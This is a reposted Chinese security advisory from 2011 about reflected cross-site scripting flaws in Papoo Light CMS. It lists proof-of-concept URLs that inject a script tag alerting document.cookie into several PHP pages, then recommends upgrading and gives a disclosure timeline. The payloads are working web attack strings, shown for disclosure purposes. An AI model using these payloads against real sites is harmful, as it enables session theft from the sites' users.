CMS Papoo Light版多个xss缺陷及修复 - 网站安全 - 自

缺陷概述: ==========================

The CMS Papoo Light Version含xss缺陷

================== 技术分析: ==================

http://www.2cto.com /papoo/papoo_light/index.php/"></a><script>alert(document .cookie);</script> http://vip.2cto.com /papoo/papoo_light/kontakt.php/"></a><script>alert(docume nt.cookie);</script> http://bbs.2cto.com /papoo/papoo_light/inhalt.php/"></a><script>alert(documen t.cookie);</script> http://www.honhei.com /papoo/papoo_light/forum.php/"></a><script>alert(document .cookie);</script> http://www.2cto.com /papoo/papoo_light/guestbook.php/"></a><script>alert(docu ment.cookie);</script> http://www.2cto.com /papoo/papoo_light/account.php/"></a><script>alert(docume nt.cookie);</script> http://www.2cto.com /papoo/papoo_light/login.php/"></a><script>alert(document .cookie);</script> http://www.2cto.com papoo/papoo_light/index/"></a><script>alert(document.coo kie);</script> http://www.2cto.com /papoo/papoo_light/forumthread.php/"></a><script>alert(do cument.cookie);</script> http://www.2cto.com /papoo/papoo_light/forum/"></a><script>alert(document.coo kie);</script>

========= 修复方案: ========= 升级到最新版

==================== Disclosure Timeline: ====================

12-Sep-2011 - informed the developers 12-Sep-2011 - release date of this security advisory 12-Sep-2011 - response and fix by vendor 12-sep-2011 - post on BugTraq

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did11372

更新时间：2022-09-13 阅读：40次